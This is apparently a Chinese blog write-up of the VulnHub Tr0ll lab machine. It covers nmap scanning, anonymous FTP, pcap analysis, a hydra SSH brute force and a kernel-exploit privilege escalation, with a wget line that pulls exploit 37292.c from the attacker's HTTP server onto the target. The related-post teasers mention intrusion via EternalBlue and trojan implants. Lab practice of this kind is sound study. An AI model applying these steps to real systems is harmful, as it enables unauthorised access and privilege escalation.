Tr0ll

原创 已于 2023-08-06 02:58:41 修改 · 125 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #网络安全 #web安全

于 2023-08-06 02:57:13 首次发布

一、nmap扫描

 先nmap扫一下靶机开放的端口

nmap --min-rate 10000 -p- 192.168.230.142

 

再用nmap获取更多的信息

    sudo nmap -p- -sS -sV -A 192.168.230.142

 可以看到ftp有一个lol.pcap的文件

二、web服务器

里面啥都没有

 三、分析lol.pcap

匿名登录ftp然后下载lol.pcap

get lol.pcap

追踪tcp流发现了个啥

追踪eq 2流量发现了sup3rs3cr3tdirlol

尝试在web访问一下这个

 下载完运行一下

再去web那看看这个

 先看一眼包含密码的文件夹

Ps:真的离谱啊,密码就是Pass.txt不是里面的goodjob·····

保存文件然后用hydra进行爆破

四、提权

ssh登录

uname -a看看系统

然后sudo -l看看,发现不太行

用searchsploit查找系统版本找到相对应的漏洞

 开启python的web服务,靶机下载exp

python -m http.server 2333
wget http://192.168.230.141:2333/37292.c

 

然后编译运行

 拿到root

nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 4245
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
Tr0ll: 1靶场渗透测试
最新发布
sucker的博客
02-28 1125
好吧,好吧,好吧,你不是一个聪明的小恶魔吗,你差点找到Sup3rs3cr3tdirol:-P\n。9,既然信息收集到了用户名字典和密码,接下来就是hydra爆破ssh。被耍了,没有什么用,再访问/sup3rs3cr3tdirlol。dir列出文件夹下的文件,分析存在一个流量包,直接把它导出来。4,既然知道开放了21端口,那就对ftp服务器匿名登录访问。设置主动模式,服务器将连接客户端指定的 IP 和端口。在info一栏注意到NO.40,分析详情信息,存在提示。
黑客工具之Nmap详细使用教程(扫描器主机、端口、版本、OS、漏洞扫描基本用法)
Cairo_A的博客
11-10 1万+
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽;fuzzer:模糊测试的脚本,发送异常的包到目标机,探测出潜在的漏洞;
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
热门推荐
freeking101的博客
07-02 1万+
Nmap 是一款开源免费的网络发现(Network Discovery)和安全审计(Security Auditing)工具。软件名字 Nmap 是Network Mapper 的简称。Nmap 最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一,号称扫描之王。...................................................
Nmap使用详解】黑客渗透工具Nmap下载安装/实战使用,保姆级Namp教程
kjuhfkicf154的博客
02-10 8295
Nmap有四种基本功能:端口扫描、主机探测、服务识别和系统识别。
如何使用渗透工具—nmap
Python_0011的博客
02-24 1302
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员和hacker必用的软件之一。
网络安全信息收集之nmap扫描渗透测试
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
10-05 2261
(也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包)是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
Vulnhub Tr0ll2靶机实战
kiritio1024513的博客
01-16 1035
一次有用的靶机实战
渗透测试靶机---Tr0ll
久恙502的博客
10-28 622
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Tr0ll3 vulnhub靶场 (scp)
weixin_62621015的博客
03-13 343
Tr0ll3 vunlhub靶场个人通关笔记
Nmap扫描渗透测试3
weixin_43708659的博客
06-15 463
Nmap扫描渗透测试3
网络安全工程师演示:黑客是如何使用Nmap网络扫描工具的?
Kali与编程
05-28 533
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。 通常我们在进行渗透测试的过程中需要对目标主机的端口开放状态进行探测,从而了解目标主机,进行对应的
vulnhub Tr0ll: 1
箭雨镜屋
12-20 1845
本文思路: nmap扫描开放端口---->匿名登录ftp,下载lol.pcap---->wireshark打开并分析lol.pcap,找到sup3rs3cr3tdirlol目录---->sup3rs3cr3tdirlol目录下找到roflmao,执行后发现0x0856BF目录---->hydra爆破得到ssh用户名密码---->提权:内核版本漏洞提权(或者定时任务提权)
一次零基础靶机渗透细节全程记录——Tr0ll
ranzi.
07-12 4687
渗透测试:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法渗透测。1.确定目标:在本靶场中,确定目标就是使用nmap进行ip扫描,确定ip即为目标,只是针对此靶场而言。其他实战中确定目标的方式包括nmap进行扫描,但不局限于这个nmap。2.信息收集:比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。3.发现漏洞:那些理论比如sql注入,文件上传等,或者找
OSCP练习:vulhub靶机TR0LL 1攻略
weixin_47311099的博客
04-13 442
信息收集 主机发现 nmap -sC -sV 192.168.8.132 发现21、22、80端口 网站信息收集 访问80端口,没啥有用信息 访问ftp 使用 Anonymous 匿名用户登录,密码为空。发现lol.pcap文件 下载lol.pacp文件 在downloads中发现lol.pcap下载成功 使用wireshark打开lol.pcap 对ftp流量包进行分析 首先使用Anonymous登录ftp服务器,syst命令获取系统版本为unix type l8 接下来又尝试访问10.0.0
Tr0ll渗透测试
weixin_56537388的博客
06-14 324
strings 命令在对象文件或二进制文件中查找可打印的字符串。发现ftp存在lol.pcap流量文件,还有FTP带有默认登录名:Anonymous ,80http存在robots.txt和/secret目录文件。tcp.stream eq 1:第一个流显示了一个文件secret_stuff.txt。访问http://192.168.182.133/sup3rs3cr3tdirlol/靶机与kali都为NAT模式,靶机默认是桥接模式,切换成NAT模式。靶机IP地址:192.168.182.133。
网络安全】手把手给大家演练渗透项目
A1_3_9_7的博客
11-28 3187
这段信息看出这两个端口开放了 pop3 的 mail 服务,那么到此我们信息收集意见归整,发现了对方的两个用户 Boris、Natalya,以及开放了邮箱服务,那么肯定是有互相交往的邮件信息,接下来的目的就很明显,知晓邮箱的账号密码登录后枚举信息。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…继续点一点,发现要登陆,使用邮件获得的用户密码进行登陆。
一篇文章教你如何使用渗透工具—nmap
logic1001的博客
12-07 1397
nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员和hacker必用的软件之一。
VulnHub-Tr0ll1靶机学习笔记与文档整理
资源摘要信息:"VulnHub-Tr0ll1.zip文件是一个包含了VulnHub-Tr0ll1靶机学习笔记及相关文档的压缩包。VulnHub是一个为安全研究人员和爱好者提供真实网络环境的平台,用于实践渗透测试技能。Tr0ll1是VulnHub上的一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值